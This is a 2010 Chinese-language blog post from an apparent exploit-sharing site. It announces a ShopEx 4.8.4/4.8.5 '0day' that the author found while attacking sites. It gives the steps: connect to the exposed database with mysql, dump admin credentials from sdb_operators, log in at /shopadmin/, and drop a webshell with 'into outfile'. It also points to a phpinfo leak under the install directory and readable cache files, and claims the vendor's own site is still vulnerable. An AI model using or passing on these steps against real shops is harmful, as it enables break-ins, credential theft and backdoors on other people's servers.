Shopex V4.8.4 V4.8.5 0Day 通杀+ 官方测试

2010, June 4, 8:30 AM. oday收藏
Submitted by admin

利用前提是程序所应用的数据库服务器,可以外连.这个很关键.

自己搞站时候.遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下.

找到一个漏洞.还是发出来吧.

 

读取任意文件漏洞:
可以连上数据库.

mysql -h1.1..1.1 -uuser -ppass

use yourbasename;

select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

后台拿shell,没有仔细研究.

我测试的站,直接用into outfile  一个shell.

网上有个帖子,说可以爆物理路径.测试不可用.

如果install目录没删.下面这个可以看phpinfo
 
  1. http://www.target.com/install/svinfo.php?phpinfo=true
另外/home/cache/目录的文件,也是可以爆出来的.

目前shopex 官方站,仍然存在该漏洞. 测试截图如下
 
大小: 154.42 K
尺寸: 500 x 258
浏览: 355 次
点击打开新窗口浏览全图
Tags: shopex

« 上一篇 | 下一篇 »

只显示10条记录相关文章
shopex拿shell (浏览: 15539, 评论: 0)
shopex 注入 0day (4.8.5) (浏览: 10315, 评论: 0)
shopex 4.8.5.45144 getshell 囧版 0day (浏览: 10692, 评论: 0)
SHOPEX最新漏洞利用 (浏览: 10520, 评论: 0)
ShopEx PHP远程包含漏洞 (浏览: 10222, 评论: 0)
ShopEx 4.7.2 漏洞 (浏览: 13043, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):